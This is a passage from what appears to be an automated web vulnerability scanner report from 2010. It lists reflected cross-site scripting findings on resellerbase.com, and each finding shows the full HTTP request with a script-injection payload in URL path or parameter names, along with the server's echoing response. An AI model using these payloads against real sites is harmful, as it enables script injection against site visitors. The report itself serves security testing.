<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2b488f<a>ae4ec27c234 was not found on this server.</p>
...[SNIP]...

2.1079. http://www.resellerbase.com/detail/12/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload addb6<script>alert(1)</script>217d62ad892 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailaddb6<script>alert(1)</script>217d62ad892/12/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailaddb6<script>alert(1)</script>217d62ad892/12/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1080. http://www.resellerbase.com/detail/12/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 91b2d<script>alert(1)</script>1d0f7322b7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1291b2d<script>alert(1)</script>1d0f7322b7/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1291b2d<script>alert(1)</script>1d0f7322b7/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1081. http://www.resellerbase.com/detail/12/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e26ea<script>alert(1)</script>87d9186f5d1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themese26ea<script>alert(1)</script>87d9186f5d1/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themese26ea<script>alert(1)</script>87d9186f5d1/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1082. http://www.resellerbase.com/detail/12/themes/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 63bbe<script>alert(1)</script>2860d9f4847 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/search.php63bbe<script>alert(1)</script>2860d9f4847?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/search.php63bbe<script>alert(1)</script>2860d9f4847?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1083. http://www.resellerbase.com/detail/12/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 8ab43<a>67d35c71751 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/12/themes/search.php?keyword=search...&Submit3=Search8ab43<a>67d35c71751&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/search.php?keyword=search...&Submit3=Search8ab43<a>67d35c71751&opt=2 was not found on this server.</p>
...[SNIP]...

2.1084. http://www.resellerbase.com/detail/12/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 19a6b<a>6a014446e98 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/12/themes/search.php?keyword=search...19a6b<a>6a014446e98&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/search.php?keyword=search...19a6b<a>6a014446e98&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1085. http://www.resellerbase.com/detail/12/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3925c<script>alert(1)</script>95033d4e58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/search.php?keyword=search...&Submit3=Search&opt=2&3925c<script>alert(1)</script>95033d4e58=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/search.php?keyword=search...&Submit3=Search&opt=2&3925c<script>alert(1)</script>95033d4e58=1 was not found on this server.</p>
...[SNIP]...

2.1086. http://www.resellerbase.com/detail/12/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 5f62e<a>f762a445952 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/12/themes/search.php?keyword=search...&Submit3=Search&opt=25f62e<a>f762a445952 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/search.php?keyword=search...&Submit3=Search&opt=25f62e<a>f762a445952 was not found on this server.</p>
...[SNIP]...

2.1087. http://www.resellerbase.com/detail/13/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/13/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5ea25<script>alert(1)</script>85468de06d4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail5ea25<script>alert(1)</script>85468de06d4/13/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail5ea25<script>alert(1)</script>85468de06d4/13/ was not found on this server.</p>
...[SNIP]...

2.1088. http://www.resellerbase.com/detail/13/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/13/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1c49d<script>alert(1)</script>5f7335e068d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/131c49d<script>alert(1)</script>5f7335e068d/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/131c49d<script>alert(1)</script>5f7335e068d/ was not found on this server.</p>
...[SNIP]...

2.1089. http://www.resellerbase.com/detail/13/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/13/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2479c<script>alert(1)</script>5e384c0b479 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/13/?2479c<script>alert(1)</script>5e384c0b479=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/13/?2479c<script>alert(1)</script>5e384c0b479=1 was not found on this server.</p>
...[SNIP]...

2.1090. http://www.resellerbase.com/detail/13/hostgator-com.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/13/hostgator-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 87352<script>alert(1)</script>11b0ecc7cee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail87352<script>alert(1)</script>11b0ecc7cee/13/hostgator-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/browsepr.php?pr=8
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail87352<script>alert(1)</script>11b0ecc7cee/13/hostgator-com.html was not found on this server.</p>
...[SNIP]...

2.1091. http://www.resellerbase.com/detail/13/hostgator-com.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/13/hostgator-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b2c36<script>alert(1)</script>c8ce7a5bbe6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/13/b2c36<script>alert(1)</script>c8ce7a5bbe6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/browsepr.php?pr=8
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/13/b2c36<script>alert(1)</script>c8ce7a5bbe6 was not found on this server.</p>
...[SNIP]...

2.1092. http://www.resellerbase.com/detail/13/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/13/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 13c05<script>alert(1)</script>a6ce8157ce6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail13c05<script>alert(1)</script>a6ce8157ce6/13/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail13c05<script>alert(1)</script>a6ce8157ce6/13/rating.php was not found on this server.</p>
...[SNIP]...

2.1093. http://www.resellerbase.com/detail/13/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/13/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 58121<script>alert(1)</script>fe2177ab6d15944d7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail58121<script>alert(1)</script>fe2177ab6d15944d7/13/rating.php?id=13&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/13/hostgator-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail58121<script>alert(1)</script>fe2177ab6d15944d7/13/rating.php?id=13&rating=5 was not found on this server.</p>
...[SNIP]...

2.1094. http://www.resellerbase.com/detail/13/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/13/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 98978<script>alert(1)</script>1fa8fb3a733a04ceb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/1398978<script>alert(1)</script>1fa8fb3a733a04ceb/rating.php?id=13&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/13/hostgator-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1398978<script>alert(1)</script>1fa8fb3a733a04ceb/rating.php?id=13&rating=5 was not found on this server.</p>
...[SNIP]...

2.1095. http://www.resellerbase.com/detail/13/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/13/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4f420<script>alert(1)</script>d077cf18770 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/134f420<script>alert(1)</script>d077cf18770/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/134f420<script>alert(1)</script>d077cf18770/rating.php was not found on this server.</p>
...[SNIP]...

2.1096. http://www.resellerbase.com/detail/13/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/13/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9fa6b<script>alert(1)</script>53c01221468 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/13/rating.php9fa6b<script>alert(1)</script>53c01221468 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/13/rating.php9fa6b<script>alert(1)</script>53c01221468 was not found on this server.</p>
...[SNIP]...

2.1097. http://www.resellerbase.com/detail/13/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/13/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8afef<script>alert(1)</script>f7e8b78c7cf4676f3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/13/rating.php8afef<script>alert(1)</script>f7e8b78c7cf4676f3?id=13&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/13/hostgator-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
